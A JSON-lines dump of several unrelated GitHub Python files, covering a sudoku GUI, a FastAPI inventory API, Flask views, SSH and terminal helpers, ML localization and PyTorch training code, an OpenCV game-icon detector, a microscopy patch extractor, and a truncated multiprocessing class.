Label(coordFrame,height=2,width=20,textvariable= col,fg=\"white\",bg=\"purple\").grid(row=0,column=2)\n\n#number button board\nnumFrame = Frame(root,height=3,width=60,bg=\"purple\")\nnumFrame.pack()\nfor i in range(1,11):\n if i != 10:\n numBtn =Button(numFrame,bd=5,width=5,height=3,text=str(i))\n numBtn.text = str(i)\n else:\n numBtn =Button(numFrame,bd=5,width=5,height=3,text=\"\")\n numBtn.text = \" \"\n numBtn.changable = True\n numBtn.config(command= lambda num = numBtn.text:setNum(num))\n numBtn.grid(row=0,column=i-1,padx=2,pady=2)\n\nfor s in range(len(sectionsBtns)):\n for r in range(len(sectionsBtns[s])):\n for c in range(len(sectionsBtns[s][r])):\n sectionsBtns[s][r][c].config(text=sectionsNums[s][r][c])\n\noutFrame = Frame(root,height=3,width=60,bg = \"purple\")\noutFrame.pack()\noutDisplay = Label(bg = \"purple\",textvariable= out,justify = \"center\")\noutDisplay.pack()\n\ncheckFrame = Frame(root,height=3,width=60,bg = \"purple\")\ncheckFrame.pack()\ncheckBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"Check\", command = check)\ncheckBtn.grid(row = 0,column= 0,padx=10)\nsolveBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"Solve\", command = solvePuzzle)\nsolveBtn.grid(row = 0,column= 1,padx=10)\ngenBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"New Puzzle\", command = newPuzzle)\ngenBtn.grid(row = 0,column= 2,padx=10)\nclearBtn = Button(checkFrame,bd=5,width=11,height=5,text=\"Clear\", command = clearBoard)\nclearBtn.grid(row = 0,column= 3,padx=10)\nroot.mainloop()","repo_name":"Koeh1124/portfolioRepo","sub_path":"python/sudoku solver/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14021749220","text":"from fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nimport json\n\nclass Product(BaseModel):\n id: int\n name: str\n price: float\n quantity: int\n\ndescription = \"\"\"\nBackendAyres API te ajuda a gerenciar melhor seu estoque. 🚀\n\n## Itens\n\nVocê poderá:\n\n* **Criar itens**.\n* **Atualizar itens**.\n* **Deletar itens**.\n* **Puxar itens**.\n\"\"\"\n\napp = FastAPI(\n title=\"BackendAyres\",\n description=description,\n version=\"0.0.1\",\n contact={\n \"name\": \"Raphael Lahiry e Rodrigo Coelho\",\n },\n license_info={\n \"name\": \"Apache 2.0\",\n \"url\": \"https://www.apache.org/licenses/LICENSE-2.0.html\",\n },\n)\n\ntags_metadata = [\n {\n \"name\": \"Get products\",\n \"description\": \"Listagem de todos os produtos em estoque\",\n },\n {\n \"name\": \"Get product\",\n \"description\": \"Lista produto específico do estoque\",\n },\n {\n \"name\": \"Create product\",\n \"description\": \"Cria um produto no estoque\",\n },\n {\n \"name\": \"Delete product\",\n \"description\": \"Deleta um produto do estoque\",\n },\n {\n \"name\": \"Update product\",\n \"description\": \"Atualiza um produto no estoque\",\n },\n]\n\n# Auxiliar functions\n\ndef verify_restrictions(product: Product, verify_product_exists: bool = True):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n if product.id < 0:\n raise HTTPException(status_code=400, detail=\"Id cannot be negative\")\n\n if product.quantity < 0:\n raise HTTPException(status_code=400, detail=\"Quantity cannot be negative\")\n\n if product.price < 0:\n raise HTTPException(status_code=400, detail=\"Price cannot be negative\")\n\n if verify_product_exists:\n if product.id in [product[\"id\"] for product in products] or product.name in [product[\"name\"] for product in products]:\n raise HTTPException(status_code=400, detail=\"Product already exists\")\n\n if product.name == \"\":\n raise HTTPException(status_code=400, detail=\"Name cannot be empty\")\n\ndef save_product(product: Product):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n products.append(product.dict())\n with open('stock.json', 'w') as f:\n json.dump({\"products\": products}, f, separators=(',',': '), indent=4)\n\n\n# Routes\n\n@app.get(\"/products\", tags=[\"Get products\"], summary=\"Listagem de todos os produtos em estoque\")\nasync def get_products():\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n return products\n\n@app.get(\"/product/{id_product}\", tags=[\"Get product\"], summary=\"Lista produto específico do estoque\")\nasync def get_product(id_product: int):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n for product in products:\n if product[\"id\"] == id_product:\n return product\n raise HTTPException(status_code=404, detail=\"Product not found\")\n\n@app.post(\"/product\", tags=[\"Create product\"], summary=\"Cria um produto no estoque\")\nasync def create_product(product: Product):\n\n verify_restrictions(product)\n save_product(product)\n\n return \"Product created successfully\"\n\n@app.patch(\"/product\", tags=[\"Update product\"], summary=\"Atualiza um produto no estoque\")\nasync def update_product(product: Product):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n verify_restrictions(product, False)\n\n update_product = product.dict()\n\n for stock_product in products:\n if stock_product[\"id\"] == update_product[\"id\"]:\n stock_product[\"name\"] = update_product[\"name\"]\n stock_product[\"price\"] = update_product[\"price\"]\n stock_product[\"quantity\"] = update_product[\"quantity\"]\n break\n\n with open('stock.json', 'w') as f:\n json.dump({\"products\": products}, f, separators=(',',': '), indent=4)\n\n return \"Product updated successfully\"\n\n@app.delete(\"/product/{id_product}\", tags=[\"Delete product\"], summary=\"Deleta um produto do estoque\")\nasync def delete_product(id_product: int):\n with open('stock.json', 'r') as f:\n products = json.load(f)['products']\n\n if id_product < 0:\n raise HTTPException(status_code=400, detail=\"Id cannot be negative\")\n\n if id_product not in [product[\"id\"] for product in products]:\n raise HTTPException(status_code=400, detail=\"Product doens't exists\")\n\n filtered_products = [product for product in products if product['id'] != id_product]\n print(filtered_products)\n\n with open('stock.json', 'w') as f:\n json.dump({\"products\": filtered_products}, f, separators=(',',': '), indent=4)\n \n return \"Product deleted successfully\"","repo_name":"Lahiry/Projeto_MegaDados","sub_path":"Fase_01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20894997814","text":"from flask import request\nfrom flask_restx import Resource, Namespace\n\nfrom app.container import genre_service\nfrom app.dao.models.genre import GenreSchema\nfrom decorators import auth_required, admin_required\n\n\ngenres_ns = Namespace('genres')\n\ngenre_schema = GenreSchema()\ngenres_schema = GenreSchema(many=True)\n\n\n@genres_ns.route('/')\nclass GenresView(Resource):\n @auth_required\n def get(self):\n all_genres = genre_service.get_all()\n return genres_schema.dump(all_genres), 200\n\n @admin_required\n def post(self):\n request_json = request.json\n\n genre_service.create(request_json)\n\n return \"New genre successfully added.\", 201\n\n\n@genres_ns.route('/')\nclass GenreView(Resource):\n @auth_required\n def get(self, id):\n genre = genre_service.get_one(id)\n return genre_schema.dump(genre), 200\n\n @admin_required\n def put(self, id):\n request_json = request.json\n request_json[\"id\"] = id\n\n genre_service.update(request_json)\n\n return \"Genre updated successfully.\", 204\n\n @admin_required\n def delete(self, id):\n genre_service.delete(id)\n\n return \"Genre deleted successfully\", 204\n","repo_name":"SeekersDream1901/Homework_19-hard_level-","sub_path":"app/views/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17042880153","text":"'''\nCreated on Dec 28, 2021\n\n@author: vladyslav_goncharuk\n'''\n\nimport os\nimport io\nimport sys\nimport fcntl\nimport struct\nimport termios\nimport glob\nimport imp\n\ndef has_fileno(stream):\n \"\"\"\n Cleanly determine whether ``stream`` has a useful ``.fileno()``.\n .. note::\n This function helps determine if a given file-like object can be used\n with various terminal-oriented modules and functions such as `select`,\n `termios`, and `tty`. For most of those, a fileno is all that is\n required; they'll function even if ``stream.isatty()`` is ``False``.\n :param stream: A file-like object.\n :returns:\n ``True`` if ``stream.fileno()`` returns an integer, ``False`` otherwise\n (this includes when ``stream`` lacks a ``fileno`` method).\n .. versionadded:: 1.0\n \"\"\"\n try:\n return isinstance(stream.fileno(), int)\n except (AttributeError, io.UnsupportedOperation):\n return False\n\ndef isatty(stream):\n \"\"\"\n Cleanly determine whether ``stream`` is a TTY.\n Specifically, first try calling ``stream.isatty()``, and if that fails\n (e.g. due to lacking the method entirely) fallback to `os.isatty`.\n .. note::\n Most of the time, we don't actually care about true TTY-ness, but\n merely whether the stream seems to have a fileno (per `has_fileno`).\n However, in some cases (notably the use of `pty.fork` to present a\n local pseudoterminal) we need to tell if a given stream has a valid\n fileno but *isn't* tied to an actual terminal. Thus, this function.\n :param stream: A file-like object.\n :returns:\n A boolean depending on the result of calling ``.isatty()`` and/or\n `os.isatty`.\n .. versionadded:: 1.0\n \"\"\"\n # If there *is* an .isatty, ask it.\n if hasattr(stream, \"isatty\") and callable(stream.isatty):\n return stream.isatty()\n # If there wasn't, see if it has a fileno, and if so, ask os.isatty\n elif has_fileno(stream):\n return os.isatty(stream.fileno())\n # If we got here, none of the above worked, so it's reasonable to assume\n # the darn thing isn't a real TTY.\n return False\n\ndef bytes_to_read(input_):\n \"\"\"\n Query stream ``input_`` to see how many bytes may be readable.\n .. note::\n If we are unable to tell (e.g. if ``input_`` isn't a true file\n descriptor or isn't a valid TTY) we fall back to suggesting reading 1\n byte only.\n :param input: Input stream object (file-like).\n :returns: `int` number of bytes to read.\n .. versionadded:: 1.0\n \"\"\"\n # NOTE: we have to check both possibilities here; situations exist where\n # it's not a tty but has a fileno, or vice versa; neither is typically\n # going to work re: ioctl().\n if not os.name == 'nt' and isatty(input_) and has_fileno(input_):\n fionread = fcntl.ioctl(input_, termios.FIONREAD, \" \")\n return struct.unpack(\"h\", fionread)[0]\n return 1\n\ndef load_module(absolute_path):\n\n print(f\"Attempt to load module - {absolute_path}\")\n\n import importlib.util\n module_name, _ = os.path.splitext(os.path.split(absolute_path)[-1])\n try:\n py_mod = imp.load_source(module_name, absolute_path)\n except ImportError as e:\n if \"No module named\" not in e.msg:\n raise e\n\n missing_module = e.name\n module_root = os.path.dirname(absolute_path)\n\n if missing_module + \".py\" not in os.listdir(module_root):\n msg = \"Could not find '{}' in '{}'\"\n raise ImportError(msg.format(missing_module, module_root))\n\n print(\"Could not directly load module, including dir: {}\".format(module_root))\n spec = importlib.util.spec_from_file_location(module_name, absolute_path)\n py_mod = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(py_mod)\n return module_name, py_mod\n\ndef load_all_modules_in_dir(module_root_dir):\n\n if not os.path.isdir(module_root_dir):\n raise Exception(f\"Provided path '{module_root_dir}' is not a directory!\")\n\n sys.path.insert(0, module_root_dir)\n\n found_python_files = glob.glob(f\"{module_root_dir}/*.py\")\n\n result = {}\n\n for found_python_file in found_python_files:\n if os.path.isfile(found_python_file) and not found_python_file.endswith('__init__.py'):\n loaded_module_name, loaded_module = load_module(found_python_file)\n\n if loaded_module:\n result[loaded_module_name] = loaded_module\n\n for file in os.listdir(module_root_dir):\n d = os.path.join(module_root_dir, file)\n if os.path.isdir(d) and d != os.path.join(module_root_dir, \"__pycache__\"):\n result.update(load_all_modules_in_dir(d))\n\n return result\n\ndef load_all_modules_in_dirs(module_paths):\n result = {}\n for module_path in module_paths:\n result.update(load_all_modules_in_dir(module_path))\n return result\n\ndef create_class_instance(full_class_name, loaded_modules):\n _, module_name, class_name = full_class_name.rsplit('.', 2)\n module = loaded_modules.get(module_name)\n\n result = None\n\n if module:\n result = getattr(module, class_name)\n else:\n raise Exception(f\"Module '{module_name}' is not loaded.\")\n\n return result\n\ndef get_terminal_dimensions():\n if isatty(sys.stdout):\n s = struct.pack('HHHH', 0, 0, 0, 0)\n t = fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, s)\n winsize = struct.unpack('hhhh', t)\n return winsize[1], winsize[0]\n else:\n return None, None\n\ndef exec_command(\n paramiko_ssh_client,\n command,\n bufsize=-1,\n timeout=None,\n environment=None,\n terminal_width = 80,\n terminal_height = 24\n ):\n chan = paramiko_ssh_client._transport.open_session(timeout=timeout)\n if isatty(sys.stdout):\n chan.get_pty(width=terminal_width, height=terminal_height)\n chan.settimeout(timeout)\n if environment:\n chan.update_environment(environment)\n chan.exec_command(command)\n stdin = chan.makefile_stdin(\"wb\", bufsize)\n stdout = chan.makefile(\"r\", bufsize)\n stderr = chan.makefile_stderr(\"r\", bufsize)\n return stdin, stdout, stderr","repo_name":"svlad-90/paf","sub_path":"paf/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"25308574878","text":"import heapq\nimport itertools\nfrom collections import defaultdict\n\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.multioutput import MultiOutputRegressor\nfrom utils.theoretical_approximation import cartesian_cross_product\n\n\ndef get_samples_by_points_num(df, points):\n grouped = df.groupby([\"Point\"])\n ret_df = grouped.get_group(points[0])\n for i in points[1:]:\n ret_df = ret_df.append(grouped.get_group(i))\n ret_df.reset_index(drop=True)\n return ret_df\n\n\ndef split_data(df, points_num, train_part, validation_part, test_part):\n assert train_part + validation_part + test_part == 1\n division = (np.array(\n points_num*np.array([train_part, validation_part, test_part]))).astype(int)\n assert np.sum(division) == points_num\n for i in range(1, len(division)):\n division[i] += division[i-1]\n division = division[:-1]\n\n return itertools.chain.from_iterable(\n map(lambda data: (data.drop(columns=[\"Point\", \"Square\", \"Orientation\"]), data[\"Square\"]),\n map(lambda points: get_samples_by_points_num(df, points),\n np.split(np.random.permutation(np.arange(points_num)), division))))\n\n\ndef split_data_regression(df, points_num, train_part, validation_part, test_part):\n assert train_part + validation_part + test_part == 1\n division = (np.array(\n points_num*np.array([train_part, validation_part, test_part]))).astype(int)\n assert np.sum(division) == points_num\n for i in range(1, len(division)):\n division[i] += division[i-1]\n division = division[:-1]\n\n return itertools.chain.from_iterable(\n map(lambda data: (data.drop(columns=[\"Point\", \"Square\", \"Orientation\", \"x\", \"y\"]), data[[\"x\", \"y\"]]),\n map(lambda points: get_samples_by_points_num(df, points),\n np.split(np.random.permutation(np.arange(points_num)), division))))\n\n\ndef split_data_regression_cv(df, points_num, n_splits):\n division = np.split(np.random.permutation(np.arange(points_num)), n_splits)\n\n for i in range(len(division)):\n train = np.hstack(division[:i] + division[i+1:])\n test = division[i]\n yield itertools.chain.from_iterable(\n map(lambda data: (data.drop(columns=[\"Point\", \"Square\", \"Orientation\", \"x\", \"y\"]), data[[\"x\", \"y\"]]),\n map(lambda points: get_samples_by_points_num(df, points), [train, test])))\n\n\ndef show_scores(model,X_test,Y_test):\n predicted = model.predict(X_test)\n print(\"Number of mislabeled points out of a total %d points : %d\"% (X_test.shape[0], (Y_test != predicted).sum()))\n probabilities = model.predict_proba(X_test)\n selected = []\n for i in probabilities:\n d = dict()\n for x,y in enumerate(i):\n d[x]=y\n selected.append(d)\n topFive = [heapq.nlargest(5,d,key=d.get)for d in selected]\n failed = 0\n for x,y in enumerate(topFive):\n if Y_test.iloc[x] not in y:\n failed+=1\n print(\"Number of points not in top 5 predicted probabilities total points: %d; failed: %d\"% (X_test.shape[0], failed))\n\n\ndef visualize_errors(model, X_train, y_train, X_test, y_test):\n predicted = model.predict(X_test)\n\n X_train[\"Square\"] = y_train.apply(str)\n X_test[\"Square\"] = y_test.apply(str)\n\n X_train[\"correct_predict\"] = y_train.apply(lambda x: \"train\")\n X_test[\"correct_predict\"] = (y_test == predicted)\n df_tmp = pd.concat([X_train, X_test], ignore_index=True )\n # Plotly visualization\n fig = px.scatter_3d(df_tmp, x=\"Server-RSSI-1\",\n y=\"Server-RSSI-2\",\n z=\"Server-RSSI-3\",\n color=\"Square\",\n symbol='correct_predict')\n fig = fig.update_traces(marker=dict(size=8,\n line=dict(width=1,\n color='DarkSlateGrey')),\n selector=dict(mode='markers'))\n fig.show()\n X_train.drop([\"correct_predict\", \"Square\"], axis=1, inplace=True)\n X_test.drop([\"correct_predict\", \"Square\"], axis=1, inplace=True)\n\n\ndef show_scores_per_point(model, X_test, y_test):\n predicted = model.predict(X_test)\n results = defaultdict(int)\n for i in range(X_test.shape[0]):\n results[y_test.iloc[i]] += y_test.iloc[i] != predicted[i]\n\n print(\"Accuracy of classifier for each square: \", end=\"\")\n for sq in range(len(results)):\n if sq % 3 == 0:\n print()\n print(\"%.2f\" % (1-results[sq]/y_test.groupby(y_test).get_group(sq).shape), end=\" \")\n print()\n\n\ndef calc_mean_df(df, merge_points_num=10):\n mean_df = pd.DataFrame(columns=df.columns)\n\n grouped_by_square = df.groupby([\"Square\"])\n for square_group in grouped_by_square.groups:\n grouped_by_point = grouped_by_square.get_group(square_group).groupby([\"Point\"])\n for point_group in grouped_by_point.groups:\n point = grouped_by_point.get_group(point_group)\n mean_df = mean_df.append(pd.DataFrame(\n np.mean(np.array([point.iloc[range(0, len(point), int(len(point)/merge_points_num))].values\n for i in range(merge_points_num)]), axis=0),\n columns=mean_df.columns))\n mean_df.reset_index(drop=True)\n return mean_df\n\n\ndef add_coordinates(df):\n square_to_top_left_corner_map = {\n \"s0\": (0, 400), \"s1\": (100, 400), \"s2\": (200, 400),\n \"s3\": (0, 300), \"s4\": (100, 300), \"s5\": (200, 300),\n \"s6\": (0, 200), \"s7\": (100, 200), \"s8\": (200, 200),\n \"s9\": (0, 100), \"s10\": (100, 100),\"s11\": (200, 100)\n }\n\n point_to_coord_map = {0: (20, -20), 1: (50, -20), 2: (80, -20),\n 7: (40, -50), 8: (50, -50), 9: (54, -50), 3: (80, -50),\n 6: (40, -80), 5: (50, -80), 4: (80, -80)\n }\n\n df[[\"x\", \"y\"]] = pd.DataFrame(df[\"Square\"].map(square_to_top_left_corner_map).to_list(), columns=[\"x\", \"y\"])\n\n df[\"x\"] = df[\"x\"] + df[\"Point\"].apply(lambda x: point_to_coord_map[x//4][0])\n df[\"y\"] = df[\"y\"] + df[\"Point\"].apply(lambda x: point_to_coord_map[x//4][1])\n return df\n\n\ndef draw_regression_accuracy(df, points_num, x_len, y_len, cv_n_split, base_model, params):\n res = pd.DataFrame(columns=[\"x\", \"y\", \"accuracy\"])\n for X_train, y_train, X_test, y_test in split_data_regression_cv(df, points_num, cv_n_split):\n model = MultiOutputRegressor(base_model(**params))\n model.fit(X_train, y_train)\n predicted = model.predict(X_test)\n res = pd.concat([res, pd.DataFrame({\"x\": y_test[\"x\"].values, \"y\": y_test[\"y\"].values, \"accuracy\": np.apply_along_axis(lambda x: (x[0]**2 + x[1]**2)**0.5, 1, np.abs(predicted - y_test))})])\n\n mean_res = res.groupby([\"x\", \"y\"]).mean().reset_index()\n\n coords = mean_res[[\"x\", \"y\"]].values\n\n field = np.zeros((y_len,x_len))\n for p in cartesian_cross_product(np.arange(field.shape[1]), np.arange(field.shape[0])):\n field[p[1], p[0]] = mean_res.iloc[np.apply_along_axis(lambda x: (x[0]**2 + x[1]**2)**0.5, 1, np.abs(coords - p)).argmin(), 2]\n\n field = np.flip(field, 0)\n fig, ax = plt.subplots(figsize=(10,10))\n sns.heatmap(field, ax=ax, xticklabels=False,yticklabels=False,cmap=\"coolwarm_r\")\n","repo_name":"Midren/Localization","sub_path":"notebooks/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16420976276","text":"import torch.nn as nn\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\n\ndatasets = CIFAR10(\n root=r'cifar',\n train=False,\n transform=transforms.ToTensor(),\n download=True,\n)\n\ndataloader = DataLoader(datasets, batch_size=64)\n\n\nclass Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.seqls1 = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=32, kernel_size=5, padding=2, stride=1),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(in_channels=32, out_channels=32, kernel_size=5, stride=1, padding=2),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1, padding=2),\n nn.MaxPool2d(kernel_size=2),\n nn.Flatten(),\n nn.Linear(1024, 64),\n nn.Linear(64, 10)\n )\n\n def forward(self, x):\n x = self.seqls1(x)\n return x\n\n\nmodel = Model()\n\n# test code\n# tensor = torch.ones([1, 3, 32, 32], dtype=torch.float)\n# print(model(tensor).shape)\n\noptim = torch.optim.SGD(model.parameters(), lr=0.05)\nloss_fn = nn.CrossEntropyLoss()\nfor epoch in range(10):\n running_loss = 0.0\n for idx, (imgs, targets) in enumerate(dataloader):\n output = model(imgs)\n loss = loss_fn(output, targets)\n optim.zero_grad()\n loss.backward()\n optim.step()\n running_loss += loss\n print(running_loss)\n","repo_name":"fl0w2Bloom/note","sub_path":"torch/nn_optim.py","file_name":"nn_optim.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10821208745","text":"import cv2\nimport numpy as np\n\n# status effects above character center point : 780,607\n# status effects top left : 738,597\n# status effects bottom right : 822,616\n\n# in paint, the coordinates are displayed as cols, rows\n\ndef find_confuse_status(img, tpl):\n \n # roi_status_effect_rows = slice(597,616)\n # roi_status_effect_cols = slice(738,822)\n\n # roi_status_effect = img[roi_status_effect_rows, roi_status_effect_cols]\n # cv2.imshow('Status effect area', roi_status_effect)\n \n # im = np.atleast_3d(roi_status_effect)\n \n im = np.atleast_3d(img)\n tpl = np.atleast_3d(tpl)\n H, W, D = im.shape[:3]\n h, w = tpl.shape[:2]\n\n # Integral image and template sum per channel\n sat = im.cumsum(1).cumsum(0)\n tplsum = np.array([tpl[:, :, i].sum() for i in range(D)])\n\n # Calculate lookup table for all the possible windows\n iA, iB, iC, iD = sat[:-h, :-w], sat[:-h, w:], sat[h:, :-w], sat[h:, w:] \n lookup = iD - iB - iC + iA\n # Possible matches\n possible_match = np.where(np.logical_and.reduce([lookup[..., i] == tplsum[i] for i in range(D)]))\n\n # Find exact match\n for y, x in zip(*possible_match):\n if np.all(im[y+1:y+h+1, x+1:x+w+1] == tpl):\n return (y+1, x+1)\n\n # raise Exception(\"Image not found\")\n return None\n \ndef main():\n im = cv2.imread('./confuse_img_2.png')\n template = cv2.imread('./confuse_icon.png')\n\n print(find_confuse_status(im, template))\n \nif __name__ == '__main__':\n main()","repo_name":"SwatSid/rotmg_scripts","sub_path":"confuse_detect.py","file_name":"confuse_detect.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25119026632","text":"import numpy as np\nimport os\nimport logging\nimport matplotlib\nimport pandas as pd\n\nfrom plot.plotting import save_single_cell_im\nfrom utils.config_reader import YamlReader\n\nmatplotlib.use('AGG')\nfrom utils.patch_utils import check_segmentation_dim, select_window\n\nlog = logging.getLogger('dynacontrast.log')\n\ndef get_patches_mp(raw_folder: str,\n supp_folder: str,\n sites: list,\n config: YamlReader,\n **kwargs):\n \"\"\" Helper function for patch extraction\n\n Wrapper method `get_patches` will be called, which\n extracts individual cells from static frames for each site.\n\n Results will be saved in the supplementary data folder, including:\n \"stacks_*.pkl\": single cell patches for each time slice\n\n Args:\n raw_folder (str): folder for raw data, segmentation and\n summarized results\n supp_folder (str): folder for supplementary data\n sites (list of str): list of site names\n config (YamlReader): config file supplied at CLI\n \"\"\"\n channels = config.preprocess.channels\n crop_size = config.preprocess.crop_size\n save_fig = config.preprocess.save_fig\n skip_boundary = config.preprocess.skip_boundary\n\n for site in sites:\n site_path = os.path.join(raw_folder + '/' + site + '.npy')\n site_supp_files_folder = os.path.join(supp_folder, '%s-supps' % site[:2], '%s' % site)\n if not os.path.exists(site_path):\n print(\"Site data not found %s\" % site_path, flush=True)\n if not os.path.exists(site_supp_files_folder):\n print(\"Site supp folder not found %s\" % site_supp_files_folder, flush=True)\n meta_path = os.path.join(site_supp_files_folder, 'patch_meta.csv')\n if not os.path.isfile(meta_path): # skip position with no cells\n log.warning('No patch_meta.csv is found in {}. Skipping...'.format(site_supp_files_folder))\n # print('No cell is detected for position {}'.format(site))\n continue\n\n try:\n get_patches(site_path,\n site_supp_files_folder,\n crop_size=crop_size,\n channels=channels,\n save_fig=save_fig,\n skip_boundary=skip_boundary,\n **kwargs)\n except Exception as e:\n log.error('Extracting patches failed for {}. '.format(site_supp_files_folder))\n log.exception('')\n # print('Extracting patches failed for position {}. '.format(site))\n # raise e\n return\n\ndef get_patches(site_path,\n site_supp_files_folder,\n crop_size=256,\n channels=None,\n save_fig=False,\n skip_boundary=False,\n ):\n \"\"\" Wrapper method for patch extraction\n\n Supplementary files generated by `find_cells` will\n be loaded for each site, then individual cells from static frames will be\n extracted and saved.\n\n Results will be saved in supplementary data folder, including:\n \"stacks_*.pkl\": single cell patches for each time slice\n\n Args:\n site_path (str): path to image stack (.npy)\n site_segmentation_path (str): path to semantic segmentation stack (.npy)\n site_supp_files_folder (str): path to the folder where supplementary \n files will be saved\n crop_size (int, optional): default=256, x, y size of the patch\n channels (list, optional): channels to extract patches. Default is all the channels\n save_fig (bool, optional): if to save extracted patches (with\n segmentation mask)\n reload (bool, optional): if to load existing stack dat files\n skip_boundary (bool, optional): if to skip patches whose edges exceed\n the image size (do not pad)\n\n \"\"\"\n\n # Load data\n image_stack = np.load(site_path)\n meta_path = os.path.join(site_supp_files_folder, 'patch_meta.csv')\n df_meta = pd.read_csv(meta_path, index_col=0, converters={\n 'cell position': lambda x: np.fromstring(x.strip(\"[]\"), sep=' ', dtype=np.int32)})\n n_z = 1\n if image_stack.ndim == 5:\n n_frames, n_channels, n_z, x_full_size, y_full_size = image_stack.shape\n elif image_stack.ndim == 4:\n n_frames, n_channels, x_full_size, y_full_size = image_stack.shape\n image_stack = np.expand_dims(image_stack, axis=2)\n else:\n raise ValueError('Input image must be 4 or 5D, not {}'.format(image_stack.ndim))\n if channels is None:\n channels = list(range(n_channels))\n image_stack = image_stack[:, channels, ...]\n for t_point in range(n_frames):\n for z in range(n_z):\n # print(\"processing timepoint {} z {}\".format(t_point, z))\n stack_dat_path = os.path.join(site_supp_files_folder, 'patches_t{}_z{}.npy'.format(t_point, z))\n # print('Writing timepoint {} z {}'.format(t_point, z))\n raw_image = image_stack[t_point, :, z, ...]\n df_meta_tz = df_meta.loc[(df_meta['time'] == t_point) & (df_meta['slice'] == z), :]\n all_cells = df_meta_tz.loc[:, ['cell ID', 'cell position']].to_numpy()\n # Save all cells in this step, filtering will be performed during analysis\n cell_patches = []\n for cell_id, cell_position in all_cells:\n # print(\"cell_id : {}, cell position: {}\".format(cell_id, cell_position))\n # Define window based on cell center and extract mask\n window = [(cell_position[0]- crop_size//2, cell_position[0]+ crop_size//2),\n (cell_position[1]- crop_size//2, cell_position[1]+ crop_size//2)]\n cell_patch = select_window(raw_image, window, padding=0, skip_boundary=skip_boundary)\n if cell_patch is None:\n # drop cell that did not get patched\n df_meta.drop(df_meta[(df_meta['cell ID'] == cell_id) &\n (df_meta['time'] == t_point) &\n (df_meta['slice'] == z)].index, inplace=True)\n else:\n cell_patches.append(cell_patch)\n if save_fig:\n im_path = os.path.join(site_supp_files_folder, 'patch_t{}_z{}_cell{}'.format(t_point, z, cell_id))\n save_single_cell_im(cell_patch, im_path)\n if cell_patches:\n cell_patches = np.stack(cell_patches)\n with open(stack_dat_path, 'wb') as f:\n # print(f\"save patches to {stack_dat_path}\")\n np.save(f, cell_patches)\n df_meta.reset_index(drop=True, inplace=True)\n df_meta.to_csv(meta_path, sep=',')\n\n\n","repo_name":"mehta-lab/dynacontrast","sub_path":"preprocess/extract_patches.py","file_name":"extract_patches.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"17703299271","text":"\"\"\"\n\"\"\"\n\n__author__ = \"Xun Li \"\n__all__ = ['MultiCoreProxy']\n\nimport os\nfrom multiprocessing import *\n\nclass TaskProcessor:\n \"\"\"\n The TaskProcessor class provides the functions necessary to process each task.\n \"\"\"\n def __init__(self, numcalcs):\n \"\"\"\n Initialise the TaskProcessor.\n \"\"\"\n self.numcalcs = numcalcs\n \n def calculate(self, angle_deg):\n \"\"\"\n Calculate the result of a task.\n \"\"\"\n result = 0\n for i in range(self.numcalcs):\n angle_rad = math.radians(angle_deg)\n result += math.tanh(angle_rad)/math.cosh(angle_rad)/self.numcalcs\n return ( angle_deg, result )\n \nclass ObjectDispatcher:\n \"\"\"\n The Dispatcher class manages the task and result queues.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialise the Dispatcher.\n \"\"\"\n self.taskQueue = Queue()\n self.resultQueue = Queue()\n \n def putTask(self, task):\n \"\"\"\n Put a task on the task queue.\n \"\"\"\n self.taskQueue.put(task)\n \n def getTask(self):\n \"\"\"\n Get a task from the task queue.\n \"\"\"\n return self.taskQueue.get()\n \n def putResult(self, output):\n \"\"\"\n Put a result on the result queue.\n \"\"\"\n self.resultQueue.put(output)\n \n def getResult(self):\n \"\"\"\n Get a result from the result queue.\n \"\"\"\n return self.resultQueue.get()\n \nclass MultiCoreProxy:\n \"\"\"\n The MultiCoreServer class provides a target worker class method for queued processes.\n \"\"\"\n def __init__(self, numprocesses=1, tasks=[ ]):\n \"\"\"\n Initialise the TaskServerMP and create the dispatcher and processes.\n \"\"\"\n self.numprocesses = numprocesses\n self.Tasks = tasks\n self.numtasks = len(tasks)\n \n # Create the dispatcher\n self.dispatcher = Dispatcher()\n \n self.Processes = [ ]\n \n # The worker processes must be started here!\n for n in range(numprocesses):\n process = 